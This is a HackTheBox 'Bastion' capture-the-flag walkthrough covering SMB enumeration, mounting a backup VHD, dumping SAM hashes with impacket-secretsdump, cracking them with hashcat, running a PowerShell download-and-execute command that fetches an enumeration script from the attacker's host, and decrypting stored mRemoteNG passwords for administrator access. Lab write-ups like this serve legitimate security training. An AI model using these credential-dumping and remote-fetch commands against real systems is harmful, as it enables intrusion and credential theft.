HackTheBox - Bastion

Nmap scan (Basic and All port scan)

Always ping the machine before starting off with nmap scan and check ttl(Time to live) value. Most of the windows machine have a ttl value of 127.

nmap -sC -sV -oA nmap-bastion 10.10.10.134

nmap -A -p- -T4 10.10.10.134

Samba Enumeration (Port 139/445)

Using smbclient to list all the shares.

We can also use smbmap with a null authentication.

This box covers the same scenario as that of Bastion Host. So what exactly is Bastion host ?

A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application, for example a proxy server, and all other services are removed or limited to reduce the threat to the computer.

Mounting the SMB Share

We can mount the SMB Share using mount command.

The Backup file size is really very large (Approximately 5 Gs)

Note: A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk of a virtual machine (VM), which may include disk partitions, a file system, files, and folders.

Mounting the .vhd file using guestmount

We can extract the .vhd file using 7z in Linux System. First we can list all the files using the following command. 7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

To mount the .vhd file system, we will be using guestmount in Linux.

apt-get install libguestfs-tools

One thing we can do is get the SAM file and SYSTEM file which contains hashes for the users present on the system.

Hash Cracking with hashcat

The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords. It can be used to authenticate local and remote users. ... SAM uses cryptographic measures to prevent unauthenticated users accessing the system.

impacket-secretsdump -sam SAM -system SYSTEM local

Tip: If the hash start with 31d6*** , that means the Administrator account is disabled.

We can crack the hash for L4mpje user using hashcat with the mode 1000 (NTLM Hash)

hashcat.exe -m 1000 hash.txt rockyou.txt

SSH Access as l4mpje

We do know that SSH is running on the machine and we can use that to get remote access.

System Enumeration using JAWS

We will use JAWS (Just Another Windows Script) for system enumeration.

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')

Exploiting mRemoteNG to extract passwords

We have mRemoteNG installed on the system and it usually stores the configuration files in AppData folder of the User.

mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager for Windows. mRemoteNG adds bug fixes and new features to mRemote. It allows you to view all of your remote connections in a simple yet powerful tabbed interface.

We can view the configuration files under: C:\Users\L4mpje\AppData\Roaming\mRemoteNG

Note: dir /a will display all the files (including hidden) starting with 'A

We have the confCons.xml file and we also have base64 string that can be decrypted with the following tool : https://github.com/haseebT/mRemoteNG-Decrypt

And we get the password for administrator. Use ssh or evil-winrm to get shell access.